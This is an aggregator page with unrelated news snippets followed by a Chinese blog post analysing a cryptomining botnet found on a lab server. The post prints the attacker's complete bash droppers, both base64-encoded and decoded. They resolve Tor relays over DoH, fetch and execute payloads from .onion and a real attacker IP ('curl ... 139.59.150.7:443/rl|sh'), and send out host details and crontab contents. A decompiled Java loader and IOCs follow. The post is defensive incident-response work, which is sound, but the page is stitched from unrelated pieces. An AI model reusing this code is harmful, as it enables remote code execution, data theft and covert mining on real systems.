Aggregator

I've spent my entire career in technology and can still recall the time when a desktop PC was the only way to work. (Truth be told, I'm also old enough to remember dumb terminals.) I also remember my first company laptop -- a beast of a thing with a monochrome display so thick it came with an integrated 2.5" floppy drive and a battery life that made it barely usable. My first mobile phone was a Motorola Timeport, the first tri-band mobile phone that could work in Europe and North America.

The video streaming traffic that Akamai delivered for more than 30 rights-holding customers during the July 11 Italy-England football (soccer) final as part of the delayed-to-2021European soccer tournament peaked at 34.9 Tbps on the Akamai edge platform. The traffic peak during the final match was the highest that Akamai reached for the tournament and was nearly 5x greater than the 7.3 Tbps peak of the 2016 Portugal-France championship match. Traffic during the June 29, 2021, round-of-16 match between Germany and England was the second-highest peak for the tournament, reaching 33.9 Tbps; third-highest was the July 6 Italy-Spain semi-final at 32.6 Tbps.

在线阅读：7月15日18:00上线扫描二维码下载电子刊扫描二维码开启答题抽奖 （已正式开始，请注意登录）7月

One year and a half following the start of the COVID-19 pandemic, we're seeing most companies either maintaining their remote work policies or slowly moving to a hybrid model. In fact, an estimated 36.2 million Americans will be working remotely by 2025, which is nearly double pre-pandemic levels.

State and local governments are weathering a digital explosion. The move to "virtual everything" means that greater amounts of information are being produced and transmitted electronically, but the digital infrastructure powering these operations is straining under the weight.

以色列反恐融资局（NBCTF）发布公告称，扣押多个对哈马斯恐怖组织进行捐赠的虚拟货币钱包。

APP抓包方法总结~

序

组里有同学说他们机器被攻击了 :(

出现的问题是有个进程占满了 cpu，并且干不掉他

那么开搞 :)

分析

登录之后看到了熟悉的随机字符串为文件名的占满了 CPU 的程序

先想到了上次帮曾大佬同学看的那台机器，于是直奔主题，看看 systemd 里面是谁把他拉起来的

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ● session-7.scope - Session 7 of user root Loaded: loaded (/run/systemd/system/session-7.scope; static; vendor preset: disabled) Drop-In: /run/systemd/system/session-7.scope.d └─50-After-systemd-logind\x2eservice.conf, 50-After-systemd-user-sessions\x2eservice.conf, 50-Description.conf, 50-SendSIGHUP.conf, 50-Slice.conf, 50-TasksMax.con f Active: active (abandoned) since 一 2021-07-12 10:05:01 CST; 4h 52min ago CGroup: /user.slice/user-0.slice/session-7.scope ├─2075 tOAK5Ejl ├─2402 tracepath └─3226 LDi4ZYIl 7月 12 14:47:44 localhost.localdomain crontab[21477]: (root) LIST (root) 7月 12 14:49:45 localhost.localdomain crontab[21591]: (root) LIST (root) 7月 12 14:49:46 localhost.localdomain crontab[21654]: (root) LIST (root) 7月 12 14:49:46 localhost.localdomain crontab[21663]: (root) LIST (root) 7月 12 14:51:48 localhost.localdomain crontab[21780]: (root) LIST (root) 7月 12 14:55:50 localhost.localdomain crontab[21971]: (root) LIST (root) 7月 12 14:55:50 localhost.localdomain crontab[21979]: (root) LIST (root) 7月 12 14:57:51 localhost.localdomain crontab[22227]: (root) REPLACE (root) 7月 12 14:57:51 localhost.localdomain crontab[22230]: (root) REPLACE (root) 7月 12 14:57:52 localhost.localdomain crontab[22289]: (root) LIST (root)

真不巧，看起来不是注册到 systemd 的，那么是谁拉起来的呢？

啊，是 crontab（这在我写这篇文章的时候才注意到）

非常不巧，我当时一心想找是哪个 service，没注意到 crontab 的存在，还以为上次的那个挖矿木马换了个 service 的名字，还去这个路径找了好久，找了半天也没有看到恶意的 service 啊

突然想到我还没看 crontab

于是打开crontab

发现了一条指令

他静静的呆在那里

像是在嘲笑我太菜了，这个套路都没注意到 :P

于是，注释掉这行，然后对着刚刚 systemd 输出的三个进程一顿 kill

1 2 3 ├─2075 tOAK5Ejl ├─2402 tracepath └─3226 LDi4ZYIl

再看看负载，瞬间安静了下来

似乎暂时搞定了，不排除还有其他后手（事后想想，当时的直觉还是对的hh

不过现在有线索了，去看看恶意文件的内容

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 [root@localhost ~]# cat .systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh #!/bin/bash exec &>/dev/null echo jeAozqLbO5Ni2rtDL7lwAMXluzYQMl echo amVBb3pxTGJPNU5pMnJ0REw3bHdBTVhsdXpZUU1sCmV4ZWMgJj4vZGV2L251bGwKZXhwb3J0IFBBVEg9JFBBVEg6JEhPTUU6L2Jpbjovc2JpbjovdXNyL2JpbjovdXNyL3NiaW46L3Vzci9sb2NhbC9iaW46L3Vzci9sb2Nh bC9zYmluCgpkPSQoZ3JlcCB4OiQoaWQgLXUpOiAvZXRjL3Bhc3N3ZHxjdXQgLWQ6IC1mNikKYz0kKGVjaG8gImN1cmwgLTRmc1NMa0EtIC1tMjAwIikKdD0kKGVjaG8gImJnZ3RzNTQ3Z3VraHZtZjRjZ2FuZGxneHhwaGVuZ3hvd m95bzZld2huczVxbW1iMmI1b2k0M3lkIikKCnNvY2t6KCkgewpuPShkb2gudGhpcy53ZWIuaWQgZG9oLnBvc3QtZmFjdHVtLnRrIGRucy5ob3N0dXgubmV0IHVuY2Vuc29yZWQubHV4MS5kbnMubml4bmV0Lnh5eiBkbnMucnVieW Zpc2guY24gZG5zLnR3bmljLnR3IGRvaC1maS5ibGFoZG5zLmNvbSBmaS5kb2guZG5zLnNub3B5dGEub3JnIHJlc29sdmVyLWV1LmxlbHV4LmZpIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyA iZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMSkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAn XG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY 2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbW F6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQ oY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iy d2ViLmluIHRvcjJ3ZWIuaXQKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wM Skvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d |bash

并不简短的程序，主要内容是一个用 base64 编码后的命令，解开之后内容如下：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 jeAozqLbO5Ni2rtDL7lwAMXluzYQMl exec &>/dev/null export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) c=$(echo "curl -4fsSLkA- -m200") t=$(echo "bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd") sockz() { n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux. fi doh.li dns.digitale-gesellschaft.ch) p=$(echo "dns-query?name=relay.tor2socks.in") s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1) } fexe() { for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done } u() { sockz f=/int.$(uname -m) x=./$(date|md5sum|cut -f1 -d-) r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base 64 -w0) $c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r chmod +x $x;$x;rm -f $x } for h in tor2web.in tor2web.it do if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then fexe;u $t.$h ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h) ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h) else break fi done

第一行随机字符串是干嘛的，我暂且不知道，这样应该会失败吧..

也不一定，除非，除非这是个可执行文件 :)

那么搜一下有没有这个可执行文件

1 find / 2>/dev/null |grep jeAozqLbO5Ni2rtDL7lwA

发现了另外的有趣的东西

再仔细看看，好家伙，还有后手

更坏的消息是，现在应该刚过了15:29，可能他又启动了

再看一看进程列表，果然。

要不是我想着摸鱼写一篇文章记录下，我可能就已经跑路，看不到这个剧情了 :)

这次不能轻易的放过他了 :)

先不急着杀掉他，把他的二进制搞出来分析分析

虽然文件被删了，但是他的文件描述符还在，所以直接把他复制出来看看，我觉得又可以丢给曾大佬玩了 :)

小插曲解决掉了，那么继续分析 bash 脚本。

为了方便阅读，我替换了一些变量名，原始的 bash 脚本可以看前面解码的内容 :)

1 2 3 4 5 6 sockz() { n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux. fi doh.li dns.digitale-gesellschaft.ch) p=$(echo "dns-query?name=relay.tor2socks.in") s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1) }

sockz函数看起来是想要通过 doh 查询 ip,这一招可以说是很妙了，直接绕过了各大厂商IDS里面恶意域名的 IOC。其中 dns.rubyfish.cn 这个域名，以及后面出现的ip.sb，这两个域名在国内的互联网圈子里面可能比较流行，暂不清楚在国外的知名度有多少。所以我可能比较倾向于这个挖矿木马是国内的黑产团队搞的。

1 2 3 fexe() { for i in . $HOME /usr/bin /root /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done }

fexe 看起来是在这几个路径里面寻找一个有读写权限的路径。

1 2 3 4 5 6 7 8 9 u() { sockz f=/int.$(uname -m) x=./$(date|md5sum|cut -f1 -d-) r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base 64 -w0) curl -x socks5h://$s:9050 bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd.onion$f -oevil_file_name -e$r || curl $1$f -oevil_file_name -e$r chmod +x evil_file_name;evil_file_name;rm -f evil_file_name }

函数 u() 是主要内容了，他生成了随机的文件名，通过 tor 代理，根据设备的架构下载了一个恶意文件/int.$(uname -m)，如/int.x86_64，然后执行这个恶意文件并且删除他。

1 2 $(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base 64 -w0)

这一行把设备的一些基本信息打包了一下，包括 ip地址、主机名、crontab内容。这里是 or 的关系，推测是如果执行失败那就上报设备信息。

1 2 3 4 5 6 7 8 9 10 for h in tor2web.in tor2web.it do if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then fexe;u $t.$h ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h) ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h) else break fi done

程序执行流程就比较容易看懂，根据 pid 文件判断程序是否启动了，如果没启动，那么就启动程序。

二进制文件分析

这个二进制文件什么都过滤不出来，但是过滤出来了一个字符串：

1 PROT_EXEC|PROT_WRITE failed.

搜一下这个字符串，可以发现有人在 stackoverflow 提了这样一个问题，问题的内容里面有这个关键字

1 2 3 4 5 6 $strings exe_file UPX! ..... PROT_EXEC|PROT_WRITE failed. $Info: This file is packed with the UPX executable packer http://upx.sf.net $ $Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $

看到了 upx 不禁眼前一亮，我之前就猜测这是 upx 加壳了，但是去除了 upx 的特征，导致过滤不出任何关键字来。

那么 upx -d 一把梭

非常棒，不能一键脱壳，那么我搞不动了 :)

找了些 upx 去特征的帖子，看了后我不想动手了，太多可以玩的地方了

首先，他可能去掉了一些 upx 识别自己压缩过的特征字符串，不过这个可以自己新建一个 upx 文件把内容复制过来。

其次，我不知道他是哪一种压缩等级，不过这个可以枚举解决，只是可能会花点时间。

最重要的一点，又到了组会的时候了，我不能再摸鱼了，不然导师问我干了啥，我又啥也没干 :)

这个问题暂时就不搞了 :)

入侵溯源

那么对面是怎么打进来的呢？

centos7有记录 crontab 日志的地方，查看 crontab 的编辑记录就知道是在9号下午 12:55:01 首次编辑 crontab 的

1 2 3 4 5 6 7 8 [root@localhost log]# cat cron*|grep RELOAD Jul 12 12:38:01 localhost crond[12721]: (root) RELOAD (/var/spool/cron/root) Jul 12 15:08:01 localhost crond[22892]: (root) RELOAD (/var/spool/cron/root) Jul 12 15:34:01 localhost crond[25783]: (root) RELOAD (/var/spool/cron/root) Jul 9 12:55:01 localhost crond[2554]: (root) RELOAD (/var/spool/cron/root) Jul 9 14:30:01 localhost crond[15227]: (root) RELOAD (/var/spool/cron/root) Jul 9 15:37:01 localhost crond[24166]: (root) RELOAD (/var/spool/cron/root)

那么，从2021.6.13 开始，到2021.7.12，执行的crontab的记录再反复过滤，运用人工的启发式搜索算法 :)

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 Jul 12 10:29:01 localhost CROND[4295]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)Jul 12 11:29:01 localhost CROND[8070]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 12 12:05:01 localhost CROND[10604]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 12 12:29:01 localhost CROND[12158]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 12 13:05:01 localhost CROND[14585]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 12 14:05:01 localhost CROND[18502]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 12 14:29:01 localhost CROND[20237]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 12 15:05:01 localhost CROND[22744]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 12 15:07:13 localhost crontab[22899]: (root) BEGIN EDIT (root) Jul 12 15:07:17 localhost crontab[22899]: (root) END EDIT (root) Jul 12 15:29:01 localhost CROND[24501]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 12 15:46:14 localhost crontab[28007]: (root) BEGIN EDIT (root) Jul 12 15:46:30 localhost crontab[28152]: (root) BEGIN EDIT (root) Jul 12 15:46:33 localhost crontab[28152]: (root) END EDIT (root) Jun 15 03:42:01 localhost anacron[24559]: Job `cron.weekly' started Jun 22 03:00:01 localhost anacron[7132]: Job `cron.weekly' started Jun 22 03:01:01 localhost anacron[7216]: Job `cron.monthly' locked by another anacron - skipping Jun 22 03:20:01 localhost anacron[7132]: Job `cron.monthly' started Jun 29 03:29:01 localhost anacron[31965]: Job `cron.weekly' started Jul 6 03:42:01 localhost anacron[20977]: Job `cron.weekly' started Jul 9 12:48:01 localhost crond[723]: (CRON) bad minute (/etc/cron.d/systemdd) Jul 9 12:48:01 localhost crond[723]: (CRON) bad minute (/etc/cron.d/systemdd) Jul 9 12:48:01 localhost crond[723]: (CRON) bad minute (/etc/cron.d/systemdd) Jul 9 12:48:01 localhost CROND[388]: (root) CMD (curl -fsS 139.59.150.7:443/rl|sh) Jul 9 12:48:01 localhost CROND[389]: (root) CMD (wget -qO- 139.59.150.7:443/rl|sh) Jul 9 12:48:02 localhost CROND[384]: (root) CMDOUT (sh: line 1: XRANDOM: command not found) Jul 9 12:48:02 localhost CROND[383]: (root) CMDOUT (sh: line 1: XRANDOM: command not found) Jul 9 13:05:02 localhost CROND[3957]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 9 13:29:01 localhost CROND[6672]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 9 13:33:59 localhost crond[7505]: (CRON) bad minute (/etc/cron.d/systemdd) Jul 9 13:33:59 localhost crond[7505]: (CRON) bad minute (/etc/cron.d/systemdd) Jul 9 13:33:59 localhost crond[7505]: (CRON) bad minute (/etc/cron.d/systemdd) Jul 9 13:35:01 localhost CROND[7580]: (root) CMD (wget -qO- 139.59.150.7:443/rl|sh) Jul 9 13:35:01 localhost CROND[7581]: (root) CMD (curl -fsS 139.59.150.7:443/rl|sh) Jul 9 13:35:02 localhost CROND[7577]: (root) CMDOUT (sh: line 1: XRANDOM: command not found) Jul 9 13:35:03 localhost CROND[7576]: (root) CMDOUT (sh: line 1: XRANDOM: command not found) Jul 9 14:05:01 localhost CROND[11627]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 9 14:29:04 localhost CROND[15270]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 9 16:05:02 localhost CROND[28101]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 9 16:29:03 localhost CROND[30857]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 9 18:05:01 localhost CROND[9615]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 9 18:29:01 localhost CROND[12804]: (root) CMD (/opt/systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &) Jul 12 10:05:01 localhost CROND[2015]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)

重点关注两个关键的时间节点

1 2 3 Jul 9 12:48:01 localhost CROND[388]: (root) CMD (curl -fsS 139.59.150.7:443/rl|sh) Jul 9 12:48:01 localhost CROND[389]: (root) CMD (wget -qO- 139.59.150.7:443/rl|sh) Jul 9 13:05:02 localhost CROND[3957]: (root) CMD (/root/.systemd-private-jeAozqLbO5Ni2rtDL7lwAMXluzYQMl.sh > /dev/null 2>&1 &)

在执行目前的挖矿程序之前，攻击者首先执行了

1 curl -fsS 139.59.150.7:443/rl|sh

内容如下

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 XRANDOM exec &>/dev/null export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin function kurl() { read proto server path <<<$(echo ${1//// }) DOC=/${path// //} HOST=${server//:*} PORT=${server//*:} [[ x"${HOST}" == x"${PORT}" ]] && PORT=80 exec 3<>/dev/tcp/${HOST}/$PORT echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3 (while read line; do [[ "$line" == $'\r' ]] && break done && cat) <&3 exec 3>&- } rm -f $HOME/ss curl -V || wget -q https://github.com/moparisthebest/static-curl/releases/download/v7.75.0/curl-amd64 -O $HOME/curl;chmod +x $HOME/curl curl -V || kurl http://139.59.150.7:443/curl > $HOME/curl;chmod +x $HOME/curl ss -v || kurl http://139.59.150.7:443/ss > $HOME/ss;chmod +x $HOME/ss ss -v || curl -s http://139.59.150.7:443/ss -o $HOME/ss;chmod +x $HOME/ss ps || curl -s http://139.59.150.7:443/ps -o $HOME/ps;chmod +x $HOME/ps d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) c=$(echo "curl -4fsSLkA- -m200") t=$(echo "rxmxpzfkydkulhhqnuftbmf6d5q67jjchopmh4ofszfwwnmz4bqq2fid") sockz() { n=(doh.defaultroutes.de dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.centraleu.pi-dns.com doh.dns.sb doh-fi.blahdns.com fi.doh.dns.snopyta.org dns.flatuslifir.is doh.li dns.digitale-gesellschaft.ch) p=$(echo "dns-query?name=relay.tor2socks.in") s=$($c https://${n[$((RANDOM%10))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1) } fexe() { for i in . $HOME /usr/bin $d /tmp /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done } u() { sockz f=/l/rd.$(uname -m) x=./$(date|md5sum|cut -f1 -d-) r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0) $c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r chmod +x $x;$x;rm -f $x } for h in tor2web.in tor2web.it onion.foundation onion.com.de onion.sh tor2web.su do if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then fexe;u $t.$h ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h) ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h) else break fi done rm -f /etc/cron.d/systemdd

内容和分析过的脚本差不多，没有什么新的消息。

奇安信 ti 和微步在线没有关于 139.59.150.7 更多的比较有用的信息了。

查了下 ssh 记录，只保留了最近一周多的记录，之前的记录没了，口令也不是弱口令啊 :(

注意到机器开了 6379

试了下，redis 没密码 :)

但是真的是 redis 打进来的么，看看 redis的执行记录

1 cat ~/.rediscli_history

里面没有用到和 config 等可疑的命令，意味着攻击者可能没有用 redis 的洞打进来，或者打进来了然后删除了记录，个人感觉使用 redis 洞的概率较小

那么攻击者到底如何进来的，目前还是未解之谜 :)

这个攻击者为了规避监测，做了不少的工作，让人感觉稍微比以前分析过的黑产有意思一点了。刚开始分析的时候觉得他的恶意程序太长了，但是仔细分析可以知道他们的为了规避审而做的隐藏还是很有价值的，包括使用 doh 解析域名， tor 代理下载恶意文件，应该能成功绕过 IDS 的审查。

看完代码，感觉这可能不只是挖矿这么简单，他的载荷任意修改就可以变成对抗一般的 IDS 的战略武器了

要说这是APT我都信，不过这似乎的确是个挖矿程序 :)

看起来应该不是白象的攻击，APT 以钓鱼为主，重点在隐蔽，不会大张旗鼓的搞挖矿。

既然有 tor 域名，那么这可以当作一个 IOC，去网上搜一搜，发现不少这样的案例

1 bggts547gukhvmf4cgandlgxxphengxovoyo6ewhns5qmmb2b5oi43yd

https://cloud.tencent.com/developer/article/1731875

https://www.zscaler.com/blogs/security-research/dreambus-botnet-technical-analysis

https://www.trendmicro.com/en_us/research/21/d/tor-based-botnet-malware-targets-linux-systems-abuses-cloud-management-tools.html

值得注意的是， zscaler 的样本似乎比我拿到的样本功能更多， zscaler 的样本包括了通过 ssh/redis/postgres/hadoop/spark等横向移动的功能。推测可能是其他设备上有包含这种功能的木马攻破我分析的这台设备后放置了一个功能更单一的木马，以规避安全人员的入侵分析。2021.7.20 注：写这篇文章的时候没发现这几个横向移动的功能，事后分析发现了这几个移动方式。

复制出来的恶意文件的IOC也在微步在线有看到

删木马用了3分钟，写博客用了3小时 :)

我感觉导师要找我交流进度了

我又只有说我摸鱼了 555555

附IOC如下：

1 2 3 4 5 6 7 8 9 $ md5sum * 1903a412002ed21dd7d90858f46717ca EQnR3jNR f411ce55ff4b6ae95d11944a0c8d594b tracepath 48b164b19a85b94be0548c542d315e31 yitxXFrW $ sha256sum * a33a641e1c866164930a5acf934231fc9896a5ad5e47bbf0784f65430e86f0dd EQnR3jNR c38c6d9ddf08ee411bedb00cc5bfd03f78af774ff408ab160e6149607bc76046 tracepath cdf9ddd2f3eac918aa25c507d7b121ba670f241e5647b23e645a9f9e35f9665a yitxXFrW 恶意文件分析

他来了，曾大佬真的来了。

曾大佬出手，分分钟拿下。

什么加壳去特征，都不是问题，曾大佬动态调试全带走 :)

我问他怎么还有时间搞这个，他说要不是不想看论文，谁会去分析这个挖矿木马呢？

这句话怎么似曾相似，啊，原来是我刚开始写这篇博客的时候也是这样说的 :P

tracepath

包含了横向移动的功能。

如果发现有 spark 节点，那么提交一个任务上去。

从 http://139.59.150.7:443/z.jar 下载 z.jar，提交上去。

那么，z.jar 是什么呢？目前还可以从这个ip地址上下载这个恶意文件。

丢进 jd-gui，看到文件的 java 代码

1 2 3 4 5 6 7 8 9 10 11 public class z { public static void main(String[] paramArrayOfString) throws Exception { String[] arrayOfString = new String[3]; arrayOfString[0] = "/bin/sh"; arrayOfString[1] = "-c"; arrayOfString[2] = "echo WFJBTkRPTQpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZnVuY3Rpb24ga3VybCgpIHsKICByZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCiAgRE9DPS8ke3BhdGgvLyAvL30KICBIT1NUPSR7c2VydmVyLy86Kn0KICBQT1JUPSR7c2VydmVyLy8qOn0KICBbWyB4IiR7SE9TVH0iID09IHgiJHtQT1JUfSIgXV0gJiYgUE9SVD04MAoKICBleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKICBlY2hvIC1lbiAiR0VUICR7RE9DfSBIVFRQLzEuMFxyXG5Ib3N0OiAke0hPU1R9XHJcblxyXG4iID4mMwogICh3aGlsZSByZWFkIGxpbmU7IGRvCiAgIFtbICIkbGluZSIgPT0gJCdccicgXV0gJiYgYnJlYWsKICBkb25lICYmIGNhdCkgPCYzCiAgZXhlYyAzPiYtCn0KCnJtIC1mICRIT01FL3NzCmN1cmwgLVYgfHwgd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vbW9wYXJpc3RoZWJlc3Qvc3RhdGljLWN1cmwvcmVsZWFzZXMvZG93bmxvYWQvdjcuNzUuMC9jdXJsLWFtZDY0IC1PICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApjdXJsIC1WIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvY3VybCA+ICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApzcyAtdiAgIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvc3MgICA+ICRIT01FL3NzO2NobW9kICt4ICRIT01FL3NzCnNzIC12ICAgfHwgY3VybCAtcyBodHRwOi8vMTM5LjU5LjE1MC43OjQ0My9zcyAtbyAkSE9NRS9zcztjaG1vZCAreCAkSE9NRS9zcwpwcyAgICAgIHx8IGN1cmwgLXMgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvcHMgLW8gJEhPTUUvcHM7Y2htb2QgK3ggJEhPTUUvcHMKCmQ9JChncmVwIHg6JChpZCAtdSk6IC9ldGMvcGFzc3d